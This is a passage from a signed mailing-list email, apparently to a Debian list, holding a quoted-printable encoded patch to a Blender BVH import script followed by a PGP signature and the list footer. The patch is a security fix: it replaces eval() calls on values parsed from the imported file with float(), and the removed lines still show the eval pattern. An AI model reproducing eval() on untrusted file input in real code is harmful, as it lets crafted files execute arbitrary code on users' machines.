tFrame, scale * float(lines[lineIdx][channelList[obIdx][2]])))
+ =20
+ if channelList[obIdx][3] !=3D '-1' or channelList[obIdx][4] !=
=3D '-1' or channelList[obIdx][5] !=3D '-1':
+- x, y, z =3D eulerRotate(eval(lines[lineIdx][channelList[obIdx=
][3]]), eval(lines[lineIdx][channelList[obIdx][4]]), eval(lines[lineIdx][ch=
annelList[obIdx][5]]))
++ x, y, z =3D eulerRotate(float(lines[lineIdx][channelList[obId=
x][3]]), float(lines[lineIdx][channelList[obIdx][4]]), float(lines[lineIdx]=
[channelList[obIdx][5]]))
+ objectList[obIdx].getIpo().getCurve('RotX').addBezier((curren=
tFrame, x))
+ objectList[obIdx].getIpo().getCurve('RotY').addBezier((curren=
tFrame, y))
+ objectList[obIdx].getIpo().getCurve('RotZ').addBezier((curren=
tFrame, z))
--4XGXW98AkZ9Jbbyi--
--rCIC/fLAoyeCowUM
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Digital signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iD8DBQFDe0gPs3U+TVFLPnwRAsOJAJwKcHodI3hm94NmszOkstSWHDdw4QCeL1la
t53d/NXWgSNaukfPg3mQH4g=
=9oHb
-----END PGP SIGNATURE-----
--rCIC/fLAoyeCowUM--
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
